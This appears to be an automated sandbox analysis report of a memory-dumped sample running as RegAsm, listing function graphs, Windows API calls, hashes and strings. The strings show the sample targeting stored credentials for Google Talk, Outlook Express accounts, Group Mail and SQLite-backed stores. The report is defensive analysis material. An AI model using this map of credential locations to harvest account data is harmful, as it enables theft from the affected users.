                                                                                                                                                                                                • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 411 4036e5-4036f5 412 4037c6-4037c7 411->412 413 4036fb-403709 call 410863 411->413 415 40370e-403710 413->415 416 4037c5 415->416 417 403716-40372a strchr 415->417 416->412 417->416 418 403730-403787 call 4021b6 _mbscpy * 2 strlen 417->418 421 4037a4-4037c0 _mbscpy call 4023e5 418->421 422 403789-4037a1 sprintf 418->422 421->416 422->421
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                  • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                • String ID: %s@gmail.com
                                                                                                                                                                                                • API String ID: 3261640601-4097000612
                                                                                                                                                                                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 424 404a99-404ac2 LoadLibraryA 425 404ac4-404ad2 424->425 426 404aec-404af4 424->426 430 404ad4-404ad8 425->430 431 404add-404ae6 FreeLibrary 425->431 429 404af5-404afa 426->429 433 404b13-404b17 429->433 434 404afc-404b12 MessageBoxA 429->434 435 404adb 430->435 431->426 432 404ae8-404aea 431->432 432->429 435->431
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$FreeLoadMessage
                                                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                • API String ID: 3897320386-317687271
                                                                                                                                                                                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 436 4034e4-403544 memset * 2 call 410b1e 439 403580-403582 436->439 440 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 436->440 440->439
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                • API String ID: 3071782539-966475738
                                                                                                                                                                                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 445 410863-41088b UuidFromStringA * 2 446 4108dd 445->446 447 41088d-41088f 445->447 448 4108df-4108e2 446->448 447->446 449 410891-4108aa call 410827 447->449 451 4108af-4108b1 449->451 451->446 452 4108b3-4108b9 451->452 453 4108bb-4108bd 452->453 454 4108be-4108db memcpy CoTaskMemFree 452->454 453->454 454->448
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                • API String ID: 1640410171-3316789007
                                                                                                                                                                                                • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                                • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                                • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                • String ID: ACD
                                                                                                                                                                                                • API String ID: 1886237854-620537770
                                                                                                                                                                                                • Opcode ID: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2054149589-0
                                                                                                                                                                                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                • memset.MSVCRT ref: 00408620
                                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                • memset.MSVCRT ref: 00408671
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                • API String ID: 1366857005-1079885057
                                                                                                                                                                                                • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                                • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFolderLibraryLoadPathSpecialVersion_mbscpymemset
                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                • API String ID: 218411198-2036018995
                                                                                                                                                                                                • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                                                                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3143880245-0
                                                                                                                                                                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                                • Opcode ID: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                                • Opcode Fuzzy Hash: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                                • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Close$Enummemset
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1615280680-0
                                                                                                                                                                                                • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                                • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                                                                                • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                                • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                                • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                                • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                                                                • API String ID: 3677997916-1155512374
                                                                                                                                                                                                • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                                • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                • String ID: eBD
                                                                                                                                                                                                • API String ID: 823142352-44267735
                                                                                                                                                                                                • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                                • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                                                                                • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
